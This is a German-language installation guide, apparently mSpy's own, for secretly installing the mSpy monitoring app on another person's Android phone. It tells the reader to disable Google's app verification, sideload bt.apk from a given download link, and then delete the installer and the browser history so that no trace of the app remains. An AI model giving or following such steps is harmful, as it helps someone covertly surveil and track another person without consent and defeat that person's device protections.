Installazione auf Android Ziel-Gerät

Um mSpy auf dem Ziel-Android-Gerät zu installieren, sollten Sie dieses Gerät in der Hand haben und die Internet-Verbindung soll auf dem Handy aktiv sein.

Es ist wichtig zu verstehen, dass aufgrund des hohen Grads der Anpassung des Android-Betriebssystem die Schritte aus der folgenden Anleitung sich von dem, was Sie auf dem tatsächlichen Telefon haben, unterscheiden können. Allerdings sind alle Menünamen ähnlich. Zum Beispiel, statt der “Anwendungen” können Sie “Apps” oder “Anwendungsmanager” sehen.

Vorbereitung

Bevor Sie mit der Installation beginnen, öffnen Sie bitte Einstellungen → Sicherheit und haken Sie Unbekannte Quellen an. Deaktivieren Sie Überprüfen Apps Option.

installde1 installde2 installde3 1ger

Note: Bei Android-Version 5.0+ befindet sich die Option Apps Überprüfen bei Google Einstellungen → Sicherheit

German1 German2 German3

Laden Sie die mSpy Anwendung herunter!

1. Öffnen Sie im Home-Bildschirm (Menü) und wählen Sie Chrome aus

2ger 3ger

2. Wenn Sie die Startseite im Chrome sehen, wischen Sie den Finger von der Mitte des Bildschirms etwas nach unten, damit die URL-Leiste oben erscheint. Löschen Sie alle Symbole da. Geben Sie dann http://b55y.net/a ein und drücken Sie Öffnen auf der Tastatur. Danach werden Sie einen Bildschirm mit einem Code.Müssen Sie diesen Code eingeben, um den Download zu starten.

captcha1 captcha2 captcha3

Bitte beachten Sie: http://b55y.net/a ist ein Download-Link, der keine neuen Web-Seiten öffnet, sondern einfach den Download auf dem Hintergrund startet (eine kleine Nachricht als Pop-up soll Sie informieren, dass der Download gestartet wurde).

3. Auf dem Home-Bildschirm wählen Sie Downloads aus. Dort sollte eine Datei bt.apk stehen. Klicken Sie auf die Datei bt.apk. Die Installation sollte beginnen.

installde7 5ger

Installiation

1. Sobald Sie die Datei bt.apk öffnen, befolgen Sie bitte diese Reihenfolge: Weiter → Installieren → Öffnen .

6ger 7ger 8ger
gm

Installation abgeschlossen!

Löschen Browser Geschichte und Installationspaket

Jetzt können Sie die bt.apk Datei aus den Downloads löschen. Haken Sie die Datei an (oder aufdrücken und halten) und Sie sollten ein Mülleimer-Zeichen oben sehen. Tippen Sie darauf, um ausgewählte Datei zu löschen.

installde7 9ger

und auch können Sie den Browserverlauf löschen, indem Sie auf Browser → Leitungsmenütaste → Einstellungen → Sicherheit & Datenschutz → Browserverlauf löschen.

installde5 installde22 installde23 installde24

Und es gibt keine Spuren von mSpy mehr auf dem Zielgerät!